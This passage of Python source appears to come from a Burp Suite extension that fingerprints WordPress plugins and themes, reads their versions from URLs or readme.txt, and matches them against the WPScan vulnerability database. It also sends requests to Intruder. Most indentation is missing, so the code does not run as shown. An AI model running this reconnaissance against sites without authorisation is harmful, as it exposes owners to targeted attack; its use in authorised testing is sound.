# Set label inside ComboBox
def __repr__(self):
return self._val
panel_upper = JPanel()
panel_upper.setLayout(BoxLayout(panel_upper, BoxLayout.Y_AXIS))
panel_update = JPanel()
panel_update.setLayout(BoxLayout(panel_update, BoxLayout.X_AXIS))
panel_update.setAlignmentX(Component.LEFT_ALIGNMENT)
self.button_update = JButton("Update", actionPerformed=self.button_update_on_click)
self.button_update.setAlignmentX(Component.LEFT_ALIGNMENT)
panel_update.add(self.button_update)
self.progressbar_update = JProgressBar()
self.progressbar_update.setMaximumSize(self.progressbar_update.getPreferredSize())
self.progressbar_update.setAlignmentX(Component.LEFT_ALIGNMENT)
panel_update.add(self.progressbar_update)
self.label_update = JLabel()
self.label_update.setAlignmentX(Component.LEFT_ALIGNMENT)
panel_update.add(self.label_update)
panel_upper.add(panel_update)
        checkbox_active_scan = JCheckBox("Use readme.txt for detecting plugin versions. This option sends an additional request to the website",
self.config.get('active_scan', False))
checkbox_active_scan.addItemListener(CheckboxListener(self, "active_scan"))
panel_upper.add(checkbox_active_scan)
        checkbox_full_body = JCheckBox("Scan the full response body (by default only the URL is checked)",
self.config.get('full_body', False))
checkbox_full_body.addItemListener(CheckboxListener(self, "full_body"))
panel_upper.add(checkbox_full_body)
        checkbox_all_vulns = JCheckBox("Print all plugin vulnerabilities regardless of the detected version",
self.config.get('all_vulns', False))
checkbox_all_vulns.addItemListener(CheckboxListener(self, "all_vulns"))
panel_upper.add(checkbox_all_vulns)
checkbox_print_info = JCheckBox(
"Print info about discovered plugins even if they don't have known vulnerabilities",
self.config.get('print_info', False))
checkbox_print_info.addItemListener(CheckboxListener(self, "print_info"))
panel_upper.add(checkbox_print_info)
checkbox_admin_ajax = JCheckBox(
"Discover plugins using wp-ajax.php?action= technique",
self.config.get('admin_ajax', True))
checkbox_admin_ajax.addItemListener(CheckboxListener(self, "admin_ajax"))
panel_upper.add(checkbox_admin_ajax)
checkbox_auto_update = JCheckBox("Enable auto update", self.config.get('auto_update', True))
checkbox_auto_update.addItemListener(CheckboxListener(self, "auto_update"))
panel_upper.add(checkbox_auto_update)
checkbox_debug = JCheckBox("Enable debug mode", self.config.get('debug', False))
checkbox_debug.addItemListener(CheckboxListener(self, "debug"))
panel_upper.add(checkbox_debug)
panel_what_detect = JPanel()
panel_what_detect.setLayout(BoxLayout(panel_what_detect, BoxLayout.X_AXIS))
panel_what_detect.setAlignmentX(Component.LEFT_ALIGNMENT)
        label_what_detect = JLabel("What to detect: ")
label_what_detect.setAlignmentX(Component.LEFT_ALIGNMENT)
panel_what_detect.add(label_what_detect)
self.combobox_scan_type = JComboBox()
self.combobox_scan_type.addItem(ComboboxItem(1, "Plugins and Themes"))
self.combobox_scan_type.addItem(ComboboxItem(2, "Only plugins"))
self.combobox_scan_type.addItem(ComboboxItem(3, "Only themes"))
self.combobox_scan_type.addActionListener(ComboboxListener(self, "scan_type"))
self.combobox_scan_type.setMaximumSize(Dimension(200, 30))
self.combobox_scan_type.setAlignmentX(Component.LEFT_ALIGNMENT)
panel_what_detect.add(self.combobox_scan_type)
label_wp_content = JLabel("Custom wp-content:")
label_wp_content.setAlignmentX(Component.LEFT_ALIGNMENT)
panel_what_detect.add(label_wp_content)
self.textfield_wp_content = JTextField(self.config.get('wp_content', 'wp-content'))
self.textfield_wp_content.getDocument().addDocumentListener(TextfieldListener(self))
self.textfield_wp_content.setMaximumSize(Dimension(250, 30))
self.textfield_wp_content.setAlignmentX(Component.LEFT_ALIGNMENT)
panel_what_detect.add(self.textfield_wp_content)
panel_upper.add(panel_what_detect)
panel_choose_file = JPanel()
panel_choose_file.setLayout(BoxLayout(panel_choose_file, BoxLayout.X_AXIS))
panel_choose_file.setAlignmentX(Component.LEFT_ALIGNMENT)
label_database_path = JLabel("Database path: ")
label_database_path.setAlignmentX(Component.LEFT_ALIGNMENT)
panel_choose_file.add(label_database_path)
button_choose_file = JButton("Choose file", actionPerformed=self.button_choose_file_on_click)
button_choose_file.setAlignmentX(Component.LEFT_ALIGNMENT)
panel_choose_file.add(button_choose_file)
self.textfield_database_path = JTextField(self.config.get('database_path', DB_NAME))
self.textfield_database_path.setEditable(False)
self.textfield_database_path.setMaximumSize(Dimension(250, 30))
self.textfield_database_path.setAlignmentX(Component.LEFT_ALIGNMENT)
panel_choose_file.add(self.textfield_database_path)
panel_upper.add(panel_choose_file)
panel_buttons = JPanel()
panel_buttons.setLayout(BoxLayout(panel_buttons, BoxLayout.X_AXIS))
panel_buttons.setAlignmentX(Component.LEFT_ALIGNMENT)
button_clear_issues = JButton("Clear issues list", actionPerformed=self.button_clear_issues_on_click)
panel_buttons.add(button_clear_issues)
button_force_update = JButton("Force update", actionPerformed=self.button_force_update_on_click)
panel_buttons.add(button_force_update)
button_reset_to_default = JButton("Reset settings to default",
actionPerformed=self.button_reset_to_default_on_click)
panel_buttons.add(button_reset_to_default)
panel_upper.add(panel_buttons)
panel_copyright = JPanel()
panel_copyright.setLayout(BoxLayout(panel_copyright, BoxLayout.X_AXIS))
panel_copyright.setAlignmentX(Component.LEFT_ALIGNMENT)
label_copyright1 = JLabel("<html><a href='#/'>WordPress Scanner {}</a></html>".format(BURP_WP_VERSION))
label_copyright1.setAlignmentX(Component.LEFT_ALIGNMENT)
label_copyright1.setCursor(Cursor(Cursor.HAND_CURSOR))
label_copyright1.addMouseListener(CopyrightMouseAdapter("https://github.com/kacperszurek/burp_wp"))
label_copyright1.setMaximumSize(label_copyright1.getPreferredSize())
panel_copyright.add(label_copyright1)
label_copyright2 = JLabel("<html> by <a href='#'>Kacper Szurek</a>.</html>")
label_copyright2.setAlignmentX(Component.LEFT_ALIGNMENT)
label_copyright2.setCursor(Cursor(Cursor.HAND_CURSOR))
label_copyright2.addMouseListener(CopyrightMouseAdapter("https://security.szurek.pl/"))
label_copyright2.setMaximumSize(label_copyright2.getPreferredSize())
panel_copyright.add(label_copyright2)
label_copyright3 = JLabel(
"<html> Vulnerabilities database by <a href='#/'>WPScan</a></html>")
label_copyright3.setAlignmentX(Component.LEFT_ALIGNMENT)
label_copyright3.setCursor(Cursor(Cursor.HAND_CURSOR))
label_copyright3.addMouseListener(CopyrightMouseAdapter("https://wpscan.org/"))
panel_copyright.add(label_copyright3)
panel_upper.add(panel_copyright)
self.table_issues = IssuesTableModel(self)
table_issues_details = IssuesDetailsTable(self, self.table_issues)
table_issues_details.setAutoCreateRowSorter(True)
panel_center = JScrollPane(table_issues_details)
self.panel_bottom = JTabbedPane()
self.panel_bottom_request1 = self.callbacks.createMessageEditor(self, True)
self.panel_bottom_response1 = self.callbacks.createMessageEditor(self, True)
self.panel_bottom_request2 = self.callbacks.createMessageEditor(self, True)
self.panel_bottom_response2 = self.callbacks.createMessageEditor(self, True)
self.panel_bottom_advisory = JEditorPane()
self.panel_bottom_advisory.setEditable(False)
self.panel_bottom_advisory.setEnabled(True)
self.panel_bottom_advisory.setContentType("text/html")
self.panel_bottom.addTab("Advisory", JScrollPane(self.panel_bottom_advisory))
self.panel_bottom.addTab("Request 1", JScrollPane(self.panel_bottom_request1.getComponent()))
self.panel_bottom.addTab("Response 1", JScrollPane(self.panel_bottom_response1.getComponent()))
self.panel_bottom.addTab("Request 2", JScrollPane(self.panel_bottom_request2.getComponent()))
self.panel_bottom.addTab("Response 2", JScrollPane(self.panel_bottom_response2.getComponent()))
split_panel_upper = JSplitPane(JSplitPane.VERTICAL_SPLIT, panel_upper, panel_center)
self.panel_main = JSplitPane(JSplitPane.VERTICAL_SPLIT, split_panel_upper, self.panel_bottom)
def initialize_database(self):
last_update = time.strftime("%d-%m-%Y %H:%M", time.localtime(self.config.get('last_update', 0)))
update_started = False
if self.config.get('auto_update', True):
if (self.config.get('last_update', 0) + (60 * 60 * 24)) < int(time.time()):
self.print_debug("[*] initialize_database Last check > 24h")
self.button_update_on_click(None)
update_started = True
else:
self.print_debug("[*] initialize_database last update: {}".format(last_update))
database_path = self.config.get('database_path', DB_NAME)
self.print_debug("[*] initialize_database database path: {}".format(database_path))
if os.path.exists(database_path):
try:
with open(database_path, "rb") as fp:
self.database = json.load(fp)
themes_length = len(self.database['themes'])
plugins_length = len(self.database['plugins'])
admin_ajax_length = len(self.database.get('admin_ajax', {}))
update_text = "Themes: {}, Plugins: {}, Admin ajax: {}, Last update: {}".format(themes_length, plugins_length, admin_ajax_length,
last_update)
self.label_update.setText(update_text)
except Exception as e:
self.label_update.setText("Cannot load database: {}".format(e))
self.print_debug("[-] initialize_database cannot load database: {}".format(traceback.format_exc()))
if not update_started:
self.button_force_update_on_click(None)
else:
self.print_debug("[-] initialize_database database does not exist")
if not update_started:
self.button_force_update_on_click(None)
def button_force_update_on_click(self, msg):
self.print_debug("[+] button_force_update_on_click")
self.update_config('sha_plugins', '')
self.update_config('sha_themes', '')
self.button_update_on_click(None)
def button_reset_to_default_on_click(self, msg):
self.print_debug("[+] button_reset_to_default_on_click")
self.callbacks.saveExtensionSetting("config", "")
JOptionPane.showMessageDialog(self.panel_main, "Please reload extension")
self.callbacks.unloadExtension()
def clear_issues(self):
if not self.lock_issues.acquire(False):
self.print_debug("[*] clear_issues cannot acquire lock")
return
try:
self.print_debug("[+] clear_issues lock acquired")
row = self.list_issues.size()
if row > 0:
self.list_issues.clear()
self.table_issues.fireTableRowsDeleted(0, (row-1))
self.panel_bottom_advisory.setText("")
self.panel_bottom_request1.setMessage("", True)
self.panel_bottom_response1.setMessage("", False)
self.panel_bottom_request2.setMessage("", True)
self.panel_bottom_response2.setMessage("", False)
self.list_plugins_on_website.clear()
except:
self.print_debug("[+] clear_issues error: {}".format(traceback.format_exc()))
finally:
self.lock_issues.release()
self.print_debug("[+] clear_issues lock release")
def button_clear_issues_on_click(self, msg):
self.print_debug("[+] button_clear_issues_on_click")
threading.Thread(target=self.clear_issues).start()
def button_update_on_click(self, msg):
threading.Thread(target=self.update_database_wrapper).start()
def button_choose_file_on_click(self, msg):
file_chooser = JFileChooser()
return_value = file_chooser.showSaveDialog(self.panel_main)
if return_value == JFileChooser.APPROVE_OPTION:
selected_file = file_chooser.getSelectedFile()
old_file_path = self.config.get('database_path', DB_NAME)
file_path = selected_file.getPath()
if file_path == old_file_path:
self.print_debug("[+] button_choose_file_on_click the same database file")
return
if selected_file.exists():
try:
with open(file_path, "rb") as fp:
temp_load = json.load(fp)
if "themes" in temp_load and "plugins" in temp_load:
self.database = temp_load
self.textfield_database_path.setText(file_path)
self.update_config('database_path', file_path)
self.update_config('last_update', int(time.time()))
self.print_debug("[+] button_choose_file_on_click offline database installed")
return
except:
self.print_debug("[+] button_choose_file_on_click cannot load offline database: {}".format(
traceback.format_exc()))
result = JOptionPane.showConfirmDialog(self.panel_main, "The file exists, overwrite?", "Existing File",
JOptionPane.YES_NO_OPTION)
if result != JOptionPane.YES_OPTION:
return
self.textfield_database_path.setText(file_path)
self.print_debug("[+] button_choose_file_on_click new database path, force update")
self.update_config('database_path', file_path)
self.button_force_update_on_click(None)
def update_config(self, key, val):
try:
self.config[key] = val
temp_config = b64encode(json.dumps(self.config, ensure_ascii=False))
self.callbacks.saveExtensionSetting("config", temp_config)
self.print_debug("[+] Config updated for key {}".format(key))
if key == "last_update":
last_update = time.strftime("%d-%m-%Y %H:%M", time.localtime(self.config.get('last_update', 0)))
themes_length = len(self.database['themes'])
plugins_length = len(self.database['plugins'])
admin_ajax_length = len(self.database.get('admin_ajax', {}))
update_text = "Themes: {}, Plugins: {}, Admin ajax: {}, Last update: {}".format(themes_length, plugins_length, admin_ajax_length,
last_update)
self.label_update.setText(update_text)
self.print_debug("[*] {}".format(update_text))
except:
self.print_debug("[-] update_config: {}".format(traceback.format_exc()))
def update_database_wrapper(self):
if not self.lock_update_database.acquire(False):
self.print_debug("[*] update_database update already running")
return
try:
self.button_update.setEnabled(False)
self.print_debug("[+] update_database update started")
if self._update_database():
try:
with open(self.config.get('database_path'), "wb") as fp:
json.dump(self.database, fp)
self.update_config('last_update', int(time.time()))
except:
self.print_debug("[-] update_database cannot save database: {}".format(traceback.format_exc()))
return
self.print_debug("[+] update_database update finish")
except:
self.print_debug("[+] update_database update error")
finally:
self.lock_update_database.release()
self.progressbar_update.setValue(100)
self.progressbar_update.setStringPainted(True)
self.button_update.setEnabled(True)
def _make_http_request_wrapper(self, original_url):
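        # Fetches original_url over HTTPS (host taken from the URL, port 443 assumed by this helper)
        # and returns the response body as a latin-1 encoded string, or None when the request fails
        # or the status code is not in INTERESTING_CODES.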
try:
java_url = URL(original_url)
request = self.helpers.buildHttpRequest(java_url)
response = self.callbacks.makeHttpRequest(java_url.getHost(), 443, True, request)
response_info = self.helpers.analyzeResponse(response)
if response_info.getStatusCode() in INTERESTING_CODES:
return self.helpers.bytesToString(response)[response_info.getBodyOffset():].encode("latin1")
else:
self.print_debug("[-] _make_http_request_wrapper request failed")
return None
except:
self.print_debug("[-] _make_http_request_wrapper failed: {}".format(traceback.format_exc()))
return None
def _update_database(self):
dict_files = {'plugins': 'https://data.wpscan.org/plugins.json',
'themes': 'https://data.wpscan.org/themes.json',
'admin_ajax': 'https://raw.githubusercontent.com/kacperszurek/burp_wp/master/data/admin_ajax.json'}
progress_divider = len(dict_files) * 2
progress_adder = 0
for _type, url in dict_files.iteritems():
try:
temp_database = collections.OrderedDict()
sha_url = "{}.sha512".format(url)
                sha_original = self._make_http_request_wrapper(sha_url)
                if not sha_original:
                    return False
                # strip trailing whitespace so the comparison with hexdigest() below is robust
                sha_original = sha_original.strip()
                if self.config.get('sha_{}'.format(_type), '') == sha_original:
self.print_debug('[*] _update_database the same hash for {}, skipping update'.format(_type))
progress_adder += int(100 / len(dict_files))
continue
self.progressbar_update.setValue(int(100/progress_divider)+progress_adder)
self.progressbar_update.setStringPainted(True)
downloaded_data = self._make_http_request_wrapper(url)
if not downloaded_data:
return False
hash_sha512 = hashlib.sha512()
hash_sha512.update(downloaded_data)
downloaded_sha = hash_sha512.hexdigest()
if sha_original != downloaded_sha:
self.print_debug(
"[-] _update_database hash mismatch for {}, should be: {} is: {}".format(_type, sha_original,
downloaded_sha))
return False
try:
loaded_json = json.loads(downloaded_data)
except:
self.print_debug(
"[-] _update_database cannot decode json for {}: {}".format(_type, traceback.format_exc()))
return False
if _type == 'admin_ajax':
temp_database = loaded_json
else:
i = 0
progress_adder += int(100 / progress_divider)
json_length = len(loaded_json)
for name in loaded_json:
bugs = []
i += 1
if i % 1000 == 0:
percent = int((i * 100. / json_length) / 4) + progress_adder
self.progressbar_update.setValue(percent)
self.progressbar_update.setStringPainted(True)
# No bugs
if len(loaded_json[name]['vulnerabilities']) == 0:
continue
for vulnerability in loaded_json[name]['vulnerabilities']:
bug = {'id': vulnerability['id'], 'title': vulnerability['title'].encode('utf-8'),
'vuln_type': vulnerability['vuln_type'].encode('utf-8'), 'reference': ''}
if 'references' in vulnerability:
if 'url' in vulnerability['references']:
references = []
for reference_url in vulnerability['references']['url']:
references.append(reference_url.encode('utf-8'))
if len(references) != 0:
bug['reference'] = references
if 'cve' in vulnerability:
bug['cve'] = vulnerability['cve'].encode('utf-8')
if 'exploitdb' in vulnerability:
bug['exploitdb'] = vulnerability['exploitdb'][0].encode('utf-8')
                            # Sometimes there is no fixed_in or it's None
if 'fixed_in' in vulnerability and vulnerability['fixed_in']:
bug['fixed_in'] = vulnerability['fixed_in'].encode('utf-8')
else:
bug['fixed_in'] = '0'
bugs.append(bug)
temp_database[name] = bugs
progress_adder += int(100 / progress_divider)
self.database[_type] = temp_database
self.update_config('sha_{}'.format(_type), sha_original)
except:
self.print_debug("_update_database parser error for {}: {}".format(_type, traceback.format_exc()))
return False
return True
def scan_type_check(self, messageInfo, as_thread):
if as_thread:
if self.config.get('scan_type', 1) == 1:
threading.Thread(target=self.check_url_or_body, args=(messageInfo, "plugins",)).start()
threading.Thread(target=self.check_url_or_body, args=(messageInfo, "themes",)).start()
elif self.config.get('scan_type', 1) == 2:
threading.Thread(target=self.check_url_or_body, args=(messageInfo, "plugins",)).start()
elif self.config.get('scan_type', 1) == 3:
threading.Thread(target=self.check_url_or_body, args=(messageInfo, "themes",)).start()
if self.config.get('admin_ajax', True):
threading.Thread(target=self.check_admin_ajax, args=(messageInfo,)).start()
else:
issues = []
if self.config.get('scan_type', 1) == 1:
issues += self.check_url_or_body(messageInfo, "plugins")
issues += (self.check_url_or_body(messageInfo, "themes") or [])
elif self.config.get('scan_type', 1) == 2:
issues += self.check_url_or_body(messageInfo, "plugins")
elif self.config.get('scan_type', 1) == 3:
issues += (self.check_url_or_body(messageInfo, "themes") or [])
if self.config.get('admin_ajax', True):
issues += self.check_admin_ajax(messageInfo)
return issues
# implement IScannerCheck
def doPassiveScan(self, baseRequestResponse):
return self.scan_type_check(baseRequestResponse, False)
def consolidateDuplicateIssues(self, existingIssue, newIssue):
return 1
# implement IHttpListener
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
if self.is_burp_pro or messageIsRequest:
return
        # We are only interested in valid responses
response = self.helpers.analyzeResponse(messageInfo.getResponse())
if response.getStatusCode() not in INTERESTING_CODES:
return
if toolFlag == IBurpExtenderCallbacks.TOOL_PROXY:
self.scan_type_check(messageInfo, True)
def check_url_or_body(self, base_request_response, _type):
if self.config.get('full_body', False):
return self.check_body(base_request_response, _type)
else:
return self.check_url(base_request_response, _type)
def check_url(self, base_request_response, _type):
try:
wp_content_pattern = bytearray(
"{}/{}/".format(self.config.get('wp_content', 'wp-content'), _type))
url = str(self.helpers.analyzeRequest(base_request_response).getUrl())
wp_content_begin_in_url = self.helpers.indexOf(url, wp_content_pattern, True, 0, len(url))
if wp_content_begin_in_url == -1:
return []
regexp_plugin_name = re.compile(
"{}/{}/([A-Za-z0-9_-]+)".format(self.config.get('wp_content', 'wp-content'), _type), re.IGNORECASE)
plugin_name_regexp = regexp_plugin_name.search(url)
if plugin_name_regexp:
current_domain_not_normalized = url[0:wp_content_begin_in_url]
current_domain = self.normalize_url(current_domain_not_normalized)
plugin_name = plugin_name_regexp.group(1).lower()
if self.is_unique_plugin_on_website(current_domain, plugin_name):
version_type = 'active'
[version_number, version_request] = self.active_scan(current_domain_not_normalized, _type,
plugin_name,
base_request_response)
request = base_request_response.getRequest()
wp_content_begin = self.helpers.indexOf(request, wp_content_pattern, True, 0, len(request))
markers = [
array('i', [wp_content_begin, wp_content_begin + len(wp_content_pattern) + len(plugin_name)])]
if version_number == '0':
version_number_regexp = self.regexp_version_number.search(url)
if version_number_regexp:
version_number = version_number_regexp.group(1).rstrip(".")
version_type = 'passive'
version_number_begin = self.helpers.indexOf(request,
self.helpers.stringToBytes(version_number),
True, 0,
len(request))
markers.append(
array('i', [version_number_begin, version_number_begin + len(version_number)]))
return self.is_vulnerable_plugin_version(self.callbacks.applyMarkers(base_request_response, markers, None),
_type, plugin_name, version_number, version_type, version_request)
return []
except:
self.print_debug("[-] check_url error: {}".format(traceback.format_exc()))
return []
def check_admin_ajax(self, base_request_response):
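        # Maps admin-ajax.php 'action' parameter values to plugin slugs via the 'admin_ajax' database.
        # Hypothetical example: a request to /wp-admin/admin-ajax.php?action=example_plugin_action
        # would flag every plugin listed under 'example_plugin_action' in that database.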
admin_ajax_pattern = bytearray("admin-ajax.php")
analyzed_request = self.helpers.analyzeRequest(base_request_response)
url = str(analyzed_request.getUrl())
is_admin_ajax = self.helpers.indexOf(url, admin_ajax_pattern, False, 0, len(url))
if is_admin_ajax == -1:
return []
issues = []
parameters = analyzed_request.getParameters()
for parameter in parameters:
if parameter.getName() == 'action':
action_value = parameter.getValue()
self.print_debug("[+] check_admin_ajax action_value: {}".format(action_value))
plugins_list = self.database.get('admin_ajax', {}).get(action_value, None)
if plugins_list:
current_domain_not_normalized = url[0:is_admin_ajax]
current_domain = self.normalize_url(current_domain_not_normalized)
for plugin_name in plugins_list:
if self.is_unique_plugin_on_website(current_domain, plugin_name):
issues += self.is_vulnerable_plugin_version(base_request_response, "plugins", plugin_name, '0', 'passive', None)
break
return issues
def check_body(self, base_request_response, _type):
response = base_request_response.getResponse()
wp_content_pattern = bytearray(
"{}/{}/".format(self.config.get('wp_content', 'wp-content'), _type))
matches = self.find_pattern_in_data(response, wp_content_pattern)
if not matches:
return []
url = str(self.helpers.analyzeRequest(base_request_response).getUrl())
current_domain = self.normalize_url(url)
regexp_plugin_name = re.compile(
"{}/{}/([A-Za-z0-9_-]+)".format(self.config.get('wp_content', 'wp-content'), _type), re.IGNORECASE)
issues = []
for wp_content_start, wp_content_stop in matches:
            # For performance reasons, inspect only part of the response
response_partial_after = self.helpers.bytesToString(
self.array_slice_bytes(response, wp_content_start, wp_content_stop + 100))
plugin_name_regexp = regexp_plugin_name.search(response_partial_after)
if plugin_name_regexp:
plugin_name = plugin_name_regexp.group(1).lower()
if self.is_unique_plugin_on_website(current_domain, plugin_name):
response_partial_before = self.helpers.bytesToString(
self.array_slice_bytes(response, wp_content_start - 100, wp_content_start)).lower()
markers = [array('i', [wp_content_start, wp_content_stop + len(plugin_name)])]
version_type = 'active'
version_number = '0'
version_request = None
url_begin_index = response_partial_before.rfind('http://')
if url_begin_index == -1:
url_begin_index = response_partial_before.rfind('https://')
if url_begin_index == -1:
url_begin_index = response_partial_before.rfind('//')
if url_begin_index != -1:
[version_number, version_request] = self.active_scan(
response_partial_before[url_begin_index:],
_type, plugin_name, base_request_response)
if version_number == '0':
# https://stackoverflow.com/questions/30020184/how-to-find-the-first-index-of-any-of-a-set-of-characters-in-a-string
url_end_index = next(
(i for i, ch in enumerate(response_partial_after) if ch in {"'", "\"", ")"}),
None)
if url_end_index:
url_end = response_partial_after[0:url_end_index]
version_number_regexp = self.regexp_version_number.search(url_end)
if version_number_regexp:
version_number = version_number_regexp.group(1).rstrip(".")
version_type = 'passive'
version_marker_start = url_end.find(version_number)
markers.append(array('i', [wp_content_start + version_marker_start,
wp_content_start + version_marker_start + len(
version_number)]))
issues += self.is_vulnerable_plugin_version(self.callbacks.applyMarkers(base_request_response, None, markers),
_type, plugin_name, version_number, version_type, version_request)
return issues
def find_pattern_in_data(self, data, pattern):
matches = []
start = 0
data_length = len(data)
pattern_length = len(pattern)
while start < data_length:
# indexOf(byte[] data, byte[] pattern, boolean caseSensitive, int from, int to)
start = self.helpers.indexOf(data, pattern, False, start, data_length)
if start == -1:
break
matches.append(array('i', [start, start + pattern_length]))
start += pattern_length
return matches
def array_slice_bytes(self, _bytes, start, stop):
byte_length = len(_bytes)
if stop > byte_length:
stop = byte_length
if start < 0:
start = 0
temp = []
for i in xrange(start, stop):
temp.append(_bytes[i])
return array('b', temp)
def normalize_url(self, url):
parsed_url = urlparse.urlparse(url)
current_domain = parsed_url.netloc
# Domain may look like www.sth.pl:80, so normalize it here
if current_domain.startswith('www.'):
current_domain = current_domain[4:]
if ":" in current_domain:
current_domain = current_domain.split(":")[0]
self.print_debug("[*] normalize_url before: {}, after: {}".format(url, current_domain))
return current_domain
def add_issue_wrapper(self, issue):
self.lock_issues.acquire()
row = self.list_issues.size()
self.list_issues.add(issue)
self.table_issues.fireTableRowsInserted(row, row)
self.lock_issues.release()
return issue
def active_scan(self, current_domain, _type, plugin_name, base_request_response):
current_version = '0'
readme_http_request = None
markers = None
if self.config.get('active_scan', False):
url = str(self.helpers.analyzeRequest(base_request_response).getUrl()).lower()
self.print_debug("Current domain: {}, URL: {}".format(current_domain, url))
if current_domain.startswith('//'):
if url.startswith('http://'):
current_domain = 'http://' + current_domain[2:]
else:
current_domain = 'https://' + current_domain[2:]
elif not current_domain.startswith('http'):
if url.startswith('http://'):
current_domain = 'http://' + current_domain
else:
current_domain = 'https://' + current_domain
readme_url = "{}{}/{}/{}/readme.txt".format(current_domain, self.config.get('wp_content', 'wp-content'),
_type, plugin_name)
self.print_debug("[*] active_scan readme_url: {}".format(readme_url))
try:
if url.endswith('readme.txt'):
# Requesting readme.txt from a readme.txt response could recurse, so don't make another request here
return ['0', None]
readme_request = self.helpers.buildHttpRequest(URL(readme_url))
readme_http_request = self.callbacks.makeHttpRequest(base_request_response.getHttpService(),
readme_request)
readme_response = readme_http_request.getResponse()
readme_response_info = self.helpers.analyzeResponse(readme_response)
if readme_response_info.getStatusCode() in INTERESTING_CODES:
# Idea from wpscan\lib\common\models\wp_item\versionable.rb
readme_content = self.helpers.bytesToString(readme_response)
regexp_stable_tag = self.regexp_stable_tag.search(readme_content)
if regexp_stable_tag:
stable_tag = regexp_stable_tag.group(1)
current_version = stable_tag
markers = [array('i', [regexp_stable_tag.start(1), regexp_stable_tag.end(1)])]
self.print_debug("[*] active_scan stable tag: {}".format(stable_tag))
changelog_regexp = self.regexp_version_from_changelog.finditer(readme_content)
for version_match in changelog_regexp:
version = version_match.group(1)
if LooseVersion(version) > LooseVersion(current_version):
self.print_debug("[*] active_scan newer version: {}".format(version))
current_version = version
markers = [array('i', [version_match.start(1), version_match.end(1)])]
if markers:
readme_http_request = self.callbacks.applyMarkers(readme_http_request, None, markers)
except:
self.print_debug(
"[-] active_scan for {} error: {}".format(readme_url, traceback.format_exc()))
return ['0', None]
return [current_version, readme_http_request]
def is_unique_plugin_on_website(self, url, plugin_name):
if plugin_name not in self.list_plugins_on_website[url]:
self.list_plugins_on_website[url].append(plugin_name)
self.print_debug("[+] is_unique_plugin_on_website URL: {}, plugin: {}".format(url, plugin_name))
return True
return False
def parse_bug_details(self, bug, plugin_name, _type):
content = "ID: <a href='https://wpvulndb.com/vulnerabilities/{}'>{}</a><br />Title: {}<br />Type: {}<br />".format(
bug['id'], bug['id'], bug['title'], bug['vuln_type'])
if 'reference' in bug:
content += "References:<br />"
for reference in bug['reference']:
content += "<a href='{}'>{}</a><br />".format(reference, reference)
if 'cve' in bug:
content += "CVE: {}<br />".format(bug['cve'])
if 'exploitdb' in bug:
content += "Exploit Database: <a href='https://www.exploit-db.com/exploits/{}/'>{}</a><br />".format(
bug['exploitdb'], bug['exploitdb'])
if 'fixed_in' in bug:
content += "Fixed in version: {}<br />".format(bug['fixed_in'])
content += "WordPress URL: <a href='https://wordpress.org/{type}/{plugin_name}'>https://wordpress.org/{type}/{plugin_name}</a>".format(
type=_type, plugin_name=plugin_name)
return content
def is_vulnerable_plugin_version(self, base_request_response, _type, plugin_name, version_number, version_type,
version_request):
has_vuln = False
issues = []
if version_type == 'active' and version_number != '0':
requests = [base_request_response, version_request]
else:
requests = [base_request_response]
url = self.helpers.analyzeRequest(base_request_response).getUrl()
if plugin_name in self.database[_type]:
self.print_debug(
"[*] is_vulnerable_plugin_version check {} {} version {}".format(_type, plugin_name, version_number))
for bug in self.database[_type][plugin_name]:
if bug['fixed_in'] == '0' or (
version_number != '0' and LooseVersion(version_number) < LooseVersion(bug['fixed_in'])):
self.print_debug(
"[+] is_vulnerable_plugin_version vulnerability inside {} version {}".format(plugin_name,
version_number))
has_vuln = True
issues.append(self.add_issue_wrapper(CustomScanIssue(
url,
requests,
"{} inside {} {} version {}".format(bug['vuln_type'], _type[:-1], plugin_name, version_number),
self.parse_bug_details(bug, plugin_name, _type),
"High", "Certain" if version_type == 'active' else "Firm")))
elif self.config.get('all_vulns', False):
self.print_debug(
"[+] is_vulnerable_plugin_version potential vulnerability inside {} version {}".format(
plugin_name, version_number))
has_vuln = True
issues.append(self.add_issue_wrapper(CustomScanIssue(
url,
requests,
"Potential {} inside {} {} fixed in {}".format(bug['vuln_type'], _type[:-1], plugin_name,
bug['fixed_in']),
self.parse_bug_details(bug, plugin_name, _type),
"Information", "Certain")))
if not has_vuln and self.config.get('print_info', False):
print_info_details = "Found {} {}".format(_type[:-1], plugin_name)
if version_number != '0':
print_info_details += " version {}".format(version_number)
self.print_debug("[+] is_vulnerable_plugin_version print info: {}".format(print_info_details))
issues.append(self.add_issue_wrapper(CustomScanIssue(
url,
requests,
print_info_details,
"{}<br /><a href='https://wordpress.org/{type}/{plugin_name}'>https://wordpress.org/{type}/{plugin_name}</a>".format(
print_info_details, type=_type, plugin_name=plugin_name),
"Information", "Certain" if version_type == 'active' and version_number != '0' else "Firm")))
return issues
def createMenuItems(self, invocation):
return [JMenuItem("Send to WordPress Scanner Intruder",
actionPerformed=lambda x, inv=invocation: self.menu_send_to_intruder_on_click(inv))]
def menu_send_to_intruder_on_click(self, invocation):
response = invocation.getSelectedMessages()[0]
http_service = response.getHttpService()
request = response.getRequest()
analyzed_request = self.helpers.analyzeRequest(response)
for param in analyzed_request.getParameters():
# Remove all POST and GET parameters
if param.getType() == IParameter.PARAM_COOKIE:
continue
request = self.helpers.removeParameter(request, param)
# Convert to GET
is_post = self.helpers.indexOf(request, bytearray("POST"), True, 0, 4)
if is_post != -1:
request = self.helpers.toggleRequestMethod(request)
# Add a trailing slash to the last part of the URL
url = str(analyzed_request.getUrl())
if not url.endswith("/"):
request_string = self.helpers.bytesToString(request)
# Find where the HTTP protocol version starts in the request line
http_index = request_string.find(" HTTP")
new_request_string = request_string[0:http_index] + "/" + request_string[http_index:]
request = self.helpers.stringToBytes(new_request_string)
http_index_new_request = self.helpers.indexOf(request, bytearray(" HTTP"), True, 0, len(request))
matches = [array('i', [http_index_new_request, http_index_new_request])]
self.callbacks.sendToIntruder(http_service.getHost(), http_service.getPort(),
True if http_service.getProtocol() == "https" else False, request, matches)
# implement IMessageEditorController
def getHttpService(self):
return self._current_advisory_entry.getHttpService()
def getRequest(self):
return self._current_advisory_entry.getRequest()
def getResponse(self):
return self._current_advisory_entry.getResponse()
# implement ITab
def getTabCaption(self):
return "WordPress Scanner"
def getUiComponent(self):
return self.panel_main
class CustomScanIssue(IScanIssue):
def __init__(self, url, http_messages, name, detail, severity, confidence):
self._url = url
self._http_messages = http_messages
self._name = name
self._detail = detail
# High, Medium, Low, Information, False positive
self._severity = severity
# Certain, Firm, Tentative
self._confidence = confidence
def getUrl(self):
return self._url
def getIssueName(self):
return self._name
